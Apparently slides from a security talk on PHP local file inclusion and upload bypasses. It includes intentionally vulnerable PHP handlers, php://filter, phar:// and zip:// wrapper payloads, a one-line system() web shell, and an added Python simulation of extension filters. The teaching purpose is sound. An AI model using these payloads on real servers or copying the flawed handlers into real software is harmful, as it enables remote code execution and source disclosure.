LFI

Local File Inclusion

by @terjanq

<?php
    // the page parameter reaches include() untouched: any readable path,
    // any stream wrapper, or any file the attacker managed to get onto disk
    if(isset($_GET['page']))
        include($_GET['page']);
    else 
        include('home');
?>

How to read .php sources?

Wrappers

php://filter

?page=php://filter/convert.base64-encode/resource=index.php makes include() print the file as base64 instead of running it. No php.ini setting is needed.

allow_url_include

Off by default. The wrappers below pull the code from the request itself or from a remote host, so they only work once it is On.

php://input

http://

data://
Sessions

<?php
session_start();

// whatever arrives as ?secret= is written, unescaped, into the session
// file on disk (sess_<PHPSESSID> under session.save_path)
if(isset($_GET["secret"])){
    $_SESSION["secret"] = $_GET["secret"];
}
if(isset($_SESSION["secret"])){
    echo "Your secret: ".$_SESSION["secret"];
}
else{
    echo "Visit <a href='?secret={your_secret}'>"
        ."?secret={your_secret}</a> to set a secret.";
}

?>

File upload

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        // only the segment after the FIRST dot is kept, case untouched
        $parts = explode('.', basename($_FILES["file"]["name"]));
        $url = $target_dir.uniqid().'.'.$parts[1];
        move_uploaded_file($_FILES["file"]["tmp_name"], $url);
    }
?>
<html>
<body>

<?php
    if($url !== FALSE)
        echo "File uploaded to: <a href='$url'>$url</a><br>";
?>
<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file" id="file">
    <input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
<!-- shell.php -->
<?php 
system($_GET['c']);

Shell!

Maybe filters?

if(strtolower($parts[1]) === 'php'){
    die('no .php extension allowed!');
}

What exactly counts as PHP?

<FilesMatch "\.ph(p[2-6]?|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>

Don't trust the Internet!

The FilesMatch above is the version that circulates in write-ups. Check what the server actually ships; the php7.x.conf on Debian and Ubuntu also hands .phar to the PHP handler, which that list misses:

$ cat /etc/apache2/mods-available/php7.2.conf

.php suffix

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        $parts = explode('.', basename($_FILES["file"]["name"]));
        if( substr(strtolower($parts[1]), 0, 2)  === 'ph'){
            die('no .ph* extension allowed!');
        }
        $url = $target_dir.uniqid().'.'.$parts[1];
        move_uploaded_file($_FILES["file"]["tmp_name"], $url);
    }

    if(isset($_GET['page'])){
        include($_GET['page'].'.php');
    }
    else{
        include('home.php');
    }
?>
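Added example (not from the slides): Python replaying the three extension checks from the upload handlers above against the FilesMatch regex shown on the slides, to see which upload names survive and which of those are executed. It assumes the regex exactly as shown and a fixed stand-in for uniqid().

```python
import re

# Added example (not from the slides): the extension checks from the upload
# handlers above, run against the Apache handler regex from the slides.

# Regex from the FilesMatch block on the slides. Assumption: the target uses
# it unchanged; shipped distribution configs differ (check the real .conf).
PHP_HANDLER = re.compile(r"\.ph(p[2-6]?|tml)$")
UNIQID = "5f3a9c1e2b7d4"   # stand-in for PHP's uniqid()


def stored_extension(filename: str) -> str:
    """explode('.', basename($name))[1]: the segment after the FIRST dot,
    original case kept. A name without a dot gives '' (PHP emits a notice)."""
    parts = filename.rsplit("/", 1)[-1].split(".")
    return parts[1] if len(parts) > 1 else ""


def no_filter(ext: str) -> bool:            # first upload.php
    return True


def filter_php(ext: str) -> bool:           # strtolower($parts[1]) === 'php' -> die
    return ext.lower() != "php"


def filter_ph_prefix(ext: str) -> bool:     # substr(strtolower(...), 0, 2) === 'ph' -> die
    return ext.lower()[:2] != "ph"


def upload_outcome(filename: str, allowed) -> str:
    """'rejected', or 'stored' (served as a static file), or 'executed'."""
    ext = stored_extension(filename)
    if not allowed(ext):
        return "rejected"
    stored_name = "uploads/%s.%s" % (UNIQID, ext)
    return "executed" if PHP_HANDLER.search(stored_name) else "stored"


if __name__ == "__main__":
    names = ["shell.php", "shell.phtml", "shell.php5", "shell.PHTML",
             "shell.jpg.php", "shell.jpg"]
    for check in (no_filter, filter_php, filter_ph_prefix):
        for name in names:
            print("%-17s %-14s %s" % (check.__name__, name, upload_outcome(name, check)))
```

Two things the table makes visible: the === 'php' check lets .phtml and .php5 through and Apache runs them, and double extensions such as shell.jpg.php buy nothing here because only $parts[1] ever reaches the stored name. The .PHTML row is stored rather than executed only because the regex is case-sensitive as written.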

Does it look dangerous?

The appended .php means a stored uploads/<id>.jpg cannot be included by name, but a wrapper decides where that suffix ends up.

phar once more!

A valid phar uploaded as uploads/<id>.jpg and requested as ?page=phar://uploads/<id>.jpg/shell becomes include('phar://uploads/<id>.jpg/shell.php'): the suffix lands on a file inside the archive, and phar:// works without allow_url_include. zip://uploads/<id>.jpg%23shell does the same with a zip.

More zips

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        $filename = basename($_FILES["file"]["name"]);
        $tmpname = $_FILES["file"]["tmp_name"];
        // only the archive's own name is checked, never the names inside it
        if( substr(explode('.', $filename)[1], 0, 3)  !== 'zip'){
            die('only zip archives allowed!');
        }
        
        $extract_path = 'extracted/'.uniqid('zip_');
        if(!is_dir('extracted')) mkdir('extracted'); 
        mkdir($extract_path);

        // entries keep their names, so a shell.php inside lands under the web root
        $res = shell_exec("unzip $tmpname -d $extract_path");
        if ($res !== FALSE) {
            echo "Files extracted to: <a href='$extract_path'>".
                 "$extract_path</a><br>";   
        } else {
            die("error occurred!");
        }
    }

Live Code!
